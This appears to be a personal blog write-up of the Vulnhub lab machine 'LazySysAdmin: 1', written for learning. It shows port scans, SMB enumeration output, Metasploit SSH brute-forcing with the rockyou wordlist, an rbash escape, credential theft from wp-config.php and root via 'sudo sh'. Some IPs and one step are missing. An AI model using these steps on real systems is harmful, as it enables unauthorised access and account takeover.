Vulnhub: LazySysAdmin: 1

Back once again with another vulnhub writeup, you guys seem to like these and a load of new VM’s were added that currently don’t have any.

As you can tell by the title this one is for “LazySysAdmin: 1

My setup is as follows:

Firstly I did a portscan, this revealed the following:

22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
6667/tcp open irc syn-ack ttl 64 InspIRCd

being a web guy the first thing I did was load up a browser, burp suite and browse the site. Not much of interest was there. So launched Nikto and dirb.
These found some folders that had directory listing enabled, but no useful content.
/info.php contained phpinfo();
/wordpress/ had a wordpress blog
/phpmyadmin/ contained phpmyadmin

I then fired wpscan against /wordpress/ with nothing useful found except a username of “admin”.

I then ran enum4linux against the box which revealed the following:

Looking up status of
        LAZYSYSADMIN    <00> -         B   Workstation Service
        LAZYSYSADMIN    <03> -         B   Messenger Service
        LAZYSYSADMIN    <20> -         B   File Server Service
        WORKGROUP       <00> -  B   Domain/Workgroup Name
        WORKGROUP       <1e> -  B   Browser Service Elections
[+] Got OS info for from srvinfo:
        LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03
//$  Mapping: DENIED, Listing: N/A
//$  Mapping: OK, Listing: OK
//$    Mapping: OK     Listing: DENIED

S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-22-1-1000 Unix User\togie (Local User)

The most useful here being the username of “togie”

On a hunch I decided to try to bruteforce the SSH service with this username:

msf auxiliary(ssh_login) > set RHOSTS
msf auxiliary(ssh_login) > set USERNAME togie
USERNAME => togie
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
msf auxiliary(ssh_login) > set PASS_FILE /opt/wordlists/rockyou.txt
PASS_FILE => /opt/wordlists/rockyou.txt
msf auxiliary(ssh_login) > run

[+] - Success: 'togie:12345' 'uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux '
[*] - Command shell session 1 closed.  Reason: Died from EOFError
[*] Command shell session 1 opened ( -> at 2017-10-05 16:09:05 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

well that was easy! after SSHing in it quickly became apparent that I was in a restricted “rbash” shell.. this was trivial to break out of:

togie@LazySysAdmin:~$ cd ..
-rbash: cd: restricted
togie@LazySysAdmin:~$ bash
togie@LazySysAdmin:~$ cd ..

from there I was able to read the wp-config.php files and gain access to phpmyadmin and wordpress (both used the same credentials), there were some other files of note in the webroot which I really should have found earlier!

Time to get root. I fired up “python -m SimpleHTTPServer” on my attacker VM and on the victim ssh downloaded and

After running them it quickly became apparent the user had sudo privs. A quick “sudo sh” and viola I was root. cd to /root and see proof.txt

root@LazySysAdmin:~# cat proof.txt

Well done :)

Hope you learn't a few things along the way.


Togie Mcdogie

Enjoy some random strings


All in all this was a fun boot2root, thanks @togiemcdogie

Leave a Reply